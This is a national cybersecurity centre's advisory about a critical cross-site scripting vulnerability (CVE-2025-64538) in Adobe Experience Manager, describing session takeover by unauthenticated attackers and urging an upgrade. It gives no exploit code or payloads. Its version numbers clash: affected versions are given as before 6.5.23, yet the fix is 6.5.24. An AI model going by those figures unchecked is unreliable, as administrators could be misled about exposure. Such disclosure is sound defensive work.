Initiativen für
Als nationale Behörde für Cybersicherheit hat das ZCB mehrere Initiativen für bestimmte Zielgruppen entwickelt, die hier vorgestellt werden.
Warning: Critical Cross-Site Scripting (XSS) in Adobe Experience Manager (AEM), Patch Immediately!
Image
Veröffentlicht : 12/12/2025
- Last update: 12/12/2025
- Affected software: Adobe Experience Manager (AEM) versions prior to 6.5.23
- Type: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- CVE/CVSS
→ CVE-2025-64538: CVSS 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)
Sources
Adobe - <https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html >
Risks
Adobe Experience Manager (AEM) is part of the Adobe Experience Cloud. It is an integrated content management system (CMS) and digital asset management (DAM) that helps businesses create, manage, and deliver websites, apps, and forms in multiple channels.
CVE-2025-64538 is a vulnerability in Adobe Experience Manager that if exploited, allows a remote attacker to inject malicious scripts in web pages. Those scripts can be executed in the victim's browser and compromise their system.
As of the time of writing this advisory (2025-12-11), there is no public proof-of-concept or proof of exploitation.
If an attacker exploits this vulnerability, that can have high impact in the confidentiality, integrity, and availability of the affected system.
Description
A network-based attacker without any privileges or prior authentication, can exploit CVE-2025-64538 to perform cross-site scripting (XSS) and by executing code remotely, they can take over the victim’s session.
All these actions require the user to interact with the system. The attacker can perform actions with the compromised user’s permissions which can lead to full system compromise.
Recommended Actions
Patch
The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority after thorough testing.
Please upgrade to version 6.5.24 or later.
Monitor/Detect
The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity and ensure a swift response in case of an intrusion.
In case of an intrusion, you can report an incident via https://ccb.belgium.be/en/cert/report-incident.
While patching appliances or software to the newest version may protect against future exploitation, it does not remediate historic compromise.